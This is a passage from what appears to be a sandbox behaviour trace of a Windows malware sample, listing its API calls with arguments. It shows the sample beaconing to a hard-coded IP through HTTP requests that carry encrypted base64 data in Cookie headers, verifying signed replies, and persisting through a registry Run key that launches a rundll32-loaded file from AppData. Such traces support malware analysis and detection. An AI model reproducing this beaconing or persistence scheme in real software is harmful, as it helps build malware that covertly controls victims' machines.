ViANtPcVGmMAEW=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTvQ2LAD7590jifZWLJ6+sukX+m7ocZWYtvbbG0zJvsfxYPwQSXjAsZOkjPokaSiOciFfF0o9JHq9yfP7yMTBFz0niRgXvN3BUfg5pQRUPdHnDpmZj8IERtaj4cB5KRJcCEYvBpZ0/1wiIEEUrmkay9Sh2ux/n3w=\r\n") returned 397 [0419.602] GetProcessHeap () returned 0x530000 [0419.602] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b630a8 | out: hHeap=0x530000) returned 1 [0419.602] GetProcessHeap () returned 0x530000 [0419.602] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a89708 | out: hHeap=0x530000) returned 1 [0419.602] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0419.602] GetProcessHeap () returned 0x530000 [0419.602] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0419.602] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0419.603] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="MgpAtRGHvDYHHuqMjChsaHiLoRULfkGcPRoPgy", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0419.603] GetProcessHeap () returned 0x530000 [0419.603] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0419.603] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0419.603] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0419.603] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0419.603] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: ViANtPcVGmMAEW=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTvQ2LAD7590jifZWLJ6+sukX+m7ocZWYtvbbG0zJvsfxYPwQSXjAsZOkjPokaSiOciFfF0o9JHq9yfP7yMTBFz0niRgXvN3BUfg5pQRUPdHnDpmZj8IERtaj4cB5KRJcCEYvBpZ0/1wiIEEUrmkay9Sh2ux/n3w=\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0420.773] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0420.773] GetProcessHeap () returned 0x530000 [0420.773] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0420.773] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0xa1) returned 1 [0420.773] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47ea1, dwNumberOfBytesToRead=0xff5f, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47ea1*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0420.774] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0420.774] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0420.774] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0420.774] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0420.774] GetProcessHeap () returned 0x530000 [0420.774] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76488 [0420.774] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76488, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76488, pcbResult=0x2cf51c) returned 0x0 [0420.774] GetProcessHeap () returned 0x530000 [0420.774] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd72f0 [0420.774] GetProcessHeap () returned 0x530000 [0420.774] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2acc8a0 [0420.774] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0420.774] GetProcessHeap () returned 0x530000 [0420.775] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd72f0 | out: hHeap=0x530000) returned 1 [0420.775] GetProcessHeap () returned 0x530000 [0420.775] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2acc8a0 | out: hHeap=0x530000) returned 1 [0420.775] GetProcessHeap () returned 0x530000 [0420.775] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b630f8 [0420.775] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0420.775] GetProcessHeap () returned 0x530000 [0420.775] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b630f8 | out: hHeap=0x530000) returned 1 [0420.775] GetProcessHeap () returned 0x530000 [0420.775] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0420.775] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0420.775] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2a764d0, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0420.776] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0420.776] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0420.776] GetProcessHeap () returned 0x530000 [0420.776] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0420.776] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0420.776] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x2a7648c, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0420.777] GetProcessHeap () returned 0x530000 [0420.777] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c650 [0420.777] GetProcessHeap () returned 0x530000 [0420.778] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0420.778] GetProcessHeap () returned 0x530000 [0420.778] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0420.778] GetProcessHeap () returned 0x530000 [0420.779] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a49848 | out: hHeap=0x530000) returned 1 [0420.779] GetProcessHeap () returned 0x530000 [0420.779] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0420.779] GetProcessHeap () returned 0x530000 [0420.779] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0420.780] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0420.780] GetProcessHeap () returned 0x530000 [0420.780] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a83b20 [0420.780] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",XyxImc") returned 96 [0420.780] GetProcessHeap () returned 0x530000 [0420.780] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a83b20 | out: hHeap=0x530000) returned 1 [0420.780] GetProcessHeap () returned 0x530000 [0420.780] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76488 [0420.780] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x658, lpdwDisposition=0x0) returned 0x0 [0420.780] GetProcessHeap () returned 0x530000 [0420.781] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0420.781] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",XyxImc") returned 96 [0420.781] RegSetValueExW (in: hKey=0x658, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",XyxImc", cbData=0xc2 | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",XyxImc") returned 0x0 [0420.781] RegCloseKey (hKey=0x658) returned 0x0 [0420.782] GetProcessHeap () returned 0x530000 [0420.782] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c650 | out: hHeap=0x530000) returned 1 [0420.782] GetProcessHeap () returned 0x530000 [0420.782] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aceb70 | out: hHeap=0x530000) returned 1 [0420.782] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xebbe1) returned 0x102 [0430.784] GetProcessHeap () returned 0x530000 [0430.784] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd72f0 [0430.784] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0430.784] GetProcessHeap () returned 0x530000 [0430.784] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd72f0 | out: hHeap=0x530000) returned 1 [0430.784] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0430.784] GetProcessHeap () returned 0x530000 [0430.784] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd72f0 [0430.784] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0430.784] GetProcessHeap () returned 0x530000 [0430.784] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd72f0 | out: hHeap=0x530000) returned 1 [0430.784] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a83b20 [0430.786] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0430.786] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0430.786] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0430.786] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0430.786] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0430.787] FindClose (in: hFindFile=0x2a83b20 | out: hFindFile=0x2a83b20) returned 1 [0430.787] GetProcessHeap () returned 0x530000 [0430.787] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x2aceb70 [0430.787] GetProcessHeap () returned 0x530000 [0430.787] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd72f0 [0430.787] GetProcessHeap () returned 0x530000 [0430.787] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2acc8a0 [0430.787] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0430.788] GetProcessHeap () returned 0x530000 [0430.788] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd72f0 | out: hHeap=0x530000) returned 1 [0430.788] GetProcessHeap () returned 0x530000 [0430.788] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2acc8a0 | out: hHeap=0x530000) returned 1 [0430.788] GetProcessHeap () returned 0x530000 [0430.788] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b630f8 [0430.789] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0430.789] GetProcessHeap () returned 0x530000 [0430.789] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b630f8 | out: hHeap=0x530000) returned 1 [0430.789] GetProcessHeap () returned 0x530000 [0430.789] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0430.789] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0430.789] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2aceb70, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0430.789] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0430.789] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0430.789] GetProcessHeap () returned 0x530000 [0430.789] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0430.789] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0430.789] GetProcessHeap () returned 0x530000 [0430.789] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x2a76488 [0430.789] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76488, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0430.790] GetProcessHeap () returned 0x530000 [0430.790] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0430.790] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76488, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76420, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76420, pcbResult=0x2cf4b4) returned 0x0 [0430.790] GetProcessHeap () returned 0x530000 [0430.790] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xcf) returned 0x2ad2ae0 [0430.790] GetProcessHeap () returned 0x530000 [0430.790] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0430.790] GetProcessHeap () returned 0x530000 [0430.790] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0430.790] CryptBinaryToStringW (in: pbBinary=0x2ad2ae0, cbBinary=0xcf, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0430.790] GetProcessHeap () returned 0x530000 [0430.790] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x22a) returned 0x2a89708 [0430.790] CryptBinaryToStringW (in: pbBinary=0x2ad2ae0, cbBinary=0xcf, dwFlags=0x40000001, pszString=0x2a89708, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTkIeQwD4DLkQ2ydcmW0olMMbmI7Aw3vkGK5meI6ZRooYrlQpJJBLUcPnVx7wX5Ec", pcchString=0x2cf504) returned 1 [0430.790] GetProcessHeap () returned 0x530000 [0430.790] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0430.791] GetProcessHeap () returned 0x530000 [0430.791] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62f18 [0430.791] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: KtNBTvNCr=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTkIeQwD4DLkQ2ydcmW0olMMbmI7Aw3vkGK5meI6ZRooYrlQpJJBLUcPnVx7wX5Ec\r\n") returned 296 [0430.791] GetProcessHeap () returned 0x530000 [0430.791] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62f18 | out: hHeap=0x530000) returned 1 [0430.791] GetProcessHeap () returned 0x530000 [0430.791] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a89708 | out: hHeap=0x530000) returned 1 [0430.791] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0430.791] GetProcessHeap () returned 0x530000 [0430.792] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0430.792] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0430.793] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="tKcWvnBRzZcTf", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0430.793] GetProcessHeap () returned 0x530000 [0430.793] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0430.793] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0430.793] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0430.793] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0430.794] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: KtNBTvNCr=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTkIeQwD4DLkQ2ydcmW0olMMbmI7Aw3vkGK5meI6ZRooYrlQpJJBLUcPnVx7wX5Ec\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0431.979] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0431.979] GetProcessHeap () returned 0x530000 [0431.979] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0431.980] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x3c8) returned 1 [0431.980] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b481c8, dwNumberOfBytesToRead=0xfc38, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b481c8*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0431.980] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0431.980] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0431.980] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0431.980] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0431.980] GetProcessHeap () returned 0x530000 [0431.980] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76488 [0431.980] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76488, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76488, pcbResult=0x2cf51c) returned 0x0 [0431.980] GetProcessHeap () returned 0x530000 [0431.980] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7110 [0431.981] GetProcessHeap () returned 0x530000 [0431.981] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2acc8a0 [0431.981] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0431.981] GetProcessHeap () returned 0x530000 [0431.981] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7110 | out: hHeap=0x530000) returned 1 [0431.981] GetProcessHeap () returned 0x530000 [0431.982] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2acc8a0 | out: hHeap=0x530000) returned 1 [0431.982] GetProcessHeap () returned 0x530000 [0431.982] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62fb8 [0431.982] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0431.982] GetProcessHeap () returned 0x530000 [0431.982] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62fb8 | out: hHeap=0x530000) returned 1 [0431.982] GetProcessHeap () returned 0x530000 [0431.982] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0431.982] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0431.982] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2a764d0, cbInput=0x8, dwFlags=0x0 | out: 